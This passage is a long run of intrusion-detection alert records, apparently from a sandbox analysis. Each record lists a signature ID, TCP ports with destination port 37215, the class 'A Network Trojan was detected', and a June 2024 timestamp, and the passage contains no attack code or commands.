                SID:2835222
                Source Port:49414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277655
                SID:2829579
                Source Port:42128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625500
                SID:2829579
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718923
                SID:2835222
                Source Port:32768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702134
                SID:2835222
                Source Port:44650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986427
                SID:2835222
                Source Port:41898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250588
                SID:2835222
                Source Port:50844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186617
                SID:2829579
                Source Port:44000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133736
                SID:2835222
                Source Port:34190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084133
                SID:2835222
                Source Port:44518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879779
                SID:2835222
                Source Port:55104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226173
                SID:2829579
                Source Port:45562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151195
                SID:2829579
                Source Port:60232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987691
                SID:2829579
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341037
                SID:2829579
                Source Port:33358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028321
                SID:2829579
                Source Port:40106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896269
                SID:2829579
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644935
                SID:2835222
                Source Port:59228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718526
                SID:2829579
                Source Port:60044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791298
                SID:2835222
                Source Port:54608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812857
                SID:2835222
                Source Port:54212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661691
                SID:2835222
                Source Port:37936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449173
                SID:2829579
                Source Port:53700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421745
                SID:2829579
                Source Port:56590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253820
                SID:2829579
                Source Port:43304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831479
                SID:2829579
                Source Port:42890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018516
                SID:2829579
                Source Port:60412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276652
                SID:2829579
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365565
                SID:2829579
                Source Port:42044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942390
                SID:2835222
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074126
                SID:2835222
                Source Port:43976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368859
                SID:2835222
                Source Port:34700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471333
                SID:2835222
                Source Port:37712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277715
                SID:2829579
                Source Port:55752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545331
                SID:2829579
                Source Port:56744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448182
                SID:2835222
                Source Port:48898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001653
                SID:2835222
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728310
                SID:2835222
                Source Port:44884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275987
                SID:2829579
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683663
                SID:2829579
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381098
                SID:2835222
                Source Port:37108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715042
                SID:2829579
                Source Port:58718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878603
                SID:2835222
                Source Port:46472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677238
                SID:2829579
                Source Port:52042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669537
                SID:2835222
                Source Port:45350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149583
                SID:2835222
                Source Port:51910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164703
                SID:2829579
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290738
                SID:2835222
                Source Port:42482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861993
                SID:2835222
                Source Port:50540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012635
                SID:2829579
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326317
                SID:2829579
                Source Port:50482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902160
                SID:2835222
                Source Port:45608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943550
                SID:2829579
                Source Port:34224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969226
                SID:2835222
                Source Port:40266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184678
                SID:2829579
                Source Port:44118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184954
                SID:2829579
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181087
                SID:2829579
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143131
                SID:2829579
                Source Port:48314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763576
                SID:2835222
                Source Port:42892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368264
                SID:2835222
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292945
                SID:2829579
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722463
                SID:2829579
                Source Port:42654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054839
                SID:2829579
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412062
                SID:2829579
                Source Port:40216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662438
                SID:2829579
                Source Port:43196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617751
                SID:2835222
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198666
                SID:2835222
                Source Port:48336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669847
                SID:2835222
                Source Port:40758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025040
                SID:2835222
                Source Port:51460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201260
                SID:2835222
                Source Port:45830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384036
                SID:2835222
                Source Port:44588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668602
                SID:2829579
                Source Port:40776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671789
                SID:2835222
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053088
                SID:2829579
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760217
                SID:2829579
                Source Port:51322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563201
                SID:2835222
                Source Port:53222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472235
                SID:2829579
                Source Port:60358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565233
                SID:2835222
                Source Port:60714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071529
                SID:2829579
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086363
                SID:2835222
                Source Port:34332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668648
                SID:2835222
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779467
                SID:2835222
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365007
                SID:2835222
                Source Port:34488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151765
                SID:2829579
                Source Port:52366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990010
                SID:2835222
                Source Port:39244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014753
                SID:2829579
                Source Port:36956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880074
                SID:2829579
                Source Port:57654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424955
                SID:2835222
                Source Port:42268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906551
                SID:2835222
                Source Port:49730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980375
                SID:2829579
                Source Port:50842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678880
                SID:2829579
                Source Port:36476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718241
                SID:2835222
                Source Port:51104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848414
                SID:2835222
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563999
                SID:2829579
                Source Port:41370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054893
                SID:2835222
                Source Port:35918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074245
                SID:2835222
                Source Port:42782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990936
                SID:2835222
                Source Port:57054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904648
                SID:2829579
                Source Port:56722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850109
                SID:2835222
                Source Port:36842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779377
                SID:2829579
                Source Port:57742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148947
                SID:2835222
                Source Port:42674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849739
                SID:2835222
                Source Port:42862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972448
                SID:2835222
                Source Port:38714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685208
                SID:2835222
                Source Port:47554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979064
                SID:2829579
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735154
                SID:2829579
                Source Port:60950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661085
                SID:2829579
                Source Port:53984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229136
                SID:2835222
                Source Port:49860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293791
                SID:2835222
                Source Port:38284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185924
                SID:2835222
                Source Port:41156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423854
                SID:2835222
                Source Port:44764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763486
                SID:2829579
                Source Port:47930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858514
                SID:2829579
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019460
                SID:2829579
                Source Port:58424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326726
                SID:2835222
                Source Port:37044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684567
                SID:2835222
                Source Port:39264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688259
                SID:2829579
                Source Port:41844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647361
                SID:2835222
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181932
                SID:2829579
                Source Port:49494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245359
                SID:2835222
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033093
                SID:2835222
                Source Port:53692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324245
                SID:2835222
                Source Port:50744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992177
                SID:2835222
                Source Port:36934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227948
                SID:2829579
                Source Port:33524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055217
                SID:2829579
                Source Port:47322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765839
                SID:2835222
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055042
                SID:2829579
                Source Port:59156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133912
                SID:2829579
                Source Port:35490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135053
                SID:2835222
                Source Port:47198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112097
                SID:2829579
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200578
                SID:2835222
                Source Port:45248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678282
                SID:2829579
                Source Port:55996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733467
                SID:2829579
                Source Port:59772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672068
                SID:2835222
                Source Port:41196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684021
                SID:2835222
                Source Port:36670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705628
                SID:2829579
                Source Port:57484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808782
                SID:2835222
                Source Port:37474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185164
                SID:2835222
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779329
                SID:2829579
                Source Port:35044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726923
                SID:2829579
                Source Port:46378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968236
                SID:2829579
                Source Port:49382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729929
                SID:2829579
                Source Port:50622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850730
                SID:2829579
                Source Port:55020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683192
                SID:2829579
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660836
                SID:2835222
                Source Port:44796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703177
                SID:2835222
                Source Port:51882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420838
                SID:2829579
                Source Port:35718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547651
                SID:2835222
                Source Port:34360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369329
                SID:2829579
                Source Port:46830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944606
                SID:2829579
                Source Port:59342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726155
                SID:2829579
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406904
                SID:2835222
                Source Port:56854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717895
                SID:2835222
                Source Port:38404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152358
                SID:2829579
                Source Port:43812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859467
                SID:2835222
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850615
                SID:2829579
                Source Port:50150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.278071
                SID:2835222
                Source Port:54748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012961
                SID:2829579
                Source Port:41336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469590
                SID:2829579
                Source Port:42270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381828
                SID:2835222
                Source Port:43498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759929
                SID:2835222
                Source Port:43752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810139
                SID:2835222
                Source Port:53688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029735
                SID:2835222
                Source Port:36294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729792
                SID:2835222
                Source Port:38100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804692
                SID:2835222
                Source Port:55128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810730
                SID:2835222
                Source Port:51750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805240
                SID:2835222
                Source Port:47106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686611
                SID:2835222
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701279
                SID:2835222
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071819
                SID:2829579
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276143
                SID:2835222
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985924
                SID:2829579
                Source Port:57926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547368
                SID:2835222
                Source Port:35986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806218
                SID:2835222
                Source Port:50266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563641
                SID:2835222
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253038
                SID:2835222
                Source Port:47246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244076
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916235
                SID:2835222
                Source Port:48836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227718
                SID:2835222
                Source Port:59810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828057
                SID:2835222
                Source Port:40856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717397
                SID:2835222
                Source Port:52464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146071
                SID:2829579
                Source Port:34960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421455
                SID:2835222
                Source Port:49466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472026
                SID:2835222
                Source Port:37074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503132
                SID:2829579
                Source Port:55742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717377
                SID:2829579
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134139
                SID:2829579
                Source Port:44194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669623
                SID:2835222
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804781
                SID:2829579
                Source Port:54442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146587
                SID:2829579
                Source Port:40658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202837
                SID:2835222
                Source Port:49346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715940
                SID:2835222
                Source Port:47954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643489
                SID:2835222
                Source Port:48176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765315
                SID:2835222
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201709
                SID:2829579
                Source Port:41672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625474
                SID:2829579
                Source Port:51296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792859
                SID:2829579
                Source Port:42180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294034
                SID:2829579
                Source Port:39530
                Destination Port:37215
